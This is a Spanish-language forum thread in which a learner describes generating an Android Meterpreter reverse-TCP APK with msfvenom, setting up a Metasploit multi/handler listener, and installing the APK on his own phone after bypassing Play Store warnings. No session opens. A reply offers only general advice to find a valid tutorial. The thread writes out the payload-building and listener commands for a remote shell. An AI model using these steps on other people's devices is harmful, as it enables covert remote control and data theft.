[SOLUCIONADO] Problema con Android Meterpreter Kali Linux

Iniciado por dkbost, Marzo 14, 2022, 03:22:53 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 14, 2022, 03:22:53 AM Ultima modificación: Marzo 19, 2022, 03:30:36 PM por AXCESS
Saludos!

Estoy aprendiendo a acceder remotamente a un dispositivo poniendo en practica mi propio dispositivo Android pero da un problema así que explicare como estoy haciendo:

abro la terminal y pongo lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp lhost=10.0.2.15 lport=5555 > /root/Escritorio/salida.apk

luego de que el apk se crea correctamente ejecuto metasploit v6.1.27-dev y uso los siguientes comandos:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverce_tcp
set LHOST 10.0.2.15
set LPORT 5555
exploit -j

y me sale el siguiente mensaje:

exploit running as background job 0.
exploit completed, but no sessions was created.
started reverse tcp handler on 10.0.2.15:5555

hasta ahí todo va bien pero que pasa luego de todo ese proceso instalo el apk en mi teléfono, me salto las verificaciones de seguridad de Google play, le doy a instalar de todas maneras y fino se instala, luego de ahí ejecuto el mainactivity desde mi teléfono y no pasa absolutamente nada, la terminal de kali se queda tal cual estaba, ejecuto el comando sessions y me sale que no hay ninguna sesión activa y la verdad es que no entiendo que es lo que estoy haciendo mal, si alguien me podría ayudar lo agradecería mucho.  :'(

Es complicado darle una respuesta acertada y satisfactoria a partir de un punto de referencia tan general. Solo se confundirá y desanimará.
También depende de muchos factores el que no le funcione: la versión de Android, el exploit que está usando, y etc. para largo.

Le recomiendo:

Cerciorarse que tiene un tutorial de guía válido en su paso a paso.

Con una búsqueda inteligente le ayudará muchísimo:
Tag:

Android Meterpreter Kali Linux
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Suerte.

Es complicado darle una respuesta acertada y satisfactoria a partir de un punto de referencia tan general. Solo se confundirá y desanimará.
También depende de muchos factores el que no le funcione: la versión de Android, el exploit que está usando, y etc. para largo.

Le recomiendo:

Cerciorarse que tiene un tutorial de guía válido en su paso a paso.

Con una búsqueda inteligente le ayudará muchísimo:
Tag:

Android Meterpreter Kali Linux

Suerte.

Saludos, la verdad entiendo tu punto y es por lo cual estoy tan desanimado :c ya que he visto cantidades de tutoriales y guías donde hago todo paso a paso y sigue sin funcionar, pero igual es comprensible, ando haciendo varios cursos de seguridad informática y todavía no toco dicho tema por lo que es irrelevante correr si no he aprendido a caminar cierto? creo que lo mejor será que me olvide de eso por un momento y me centre en seguir aprendiendo hasta tocar ese tema.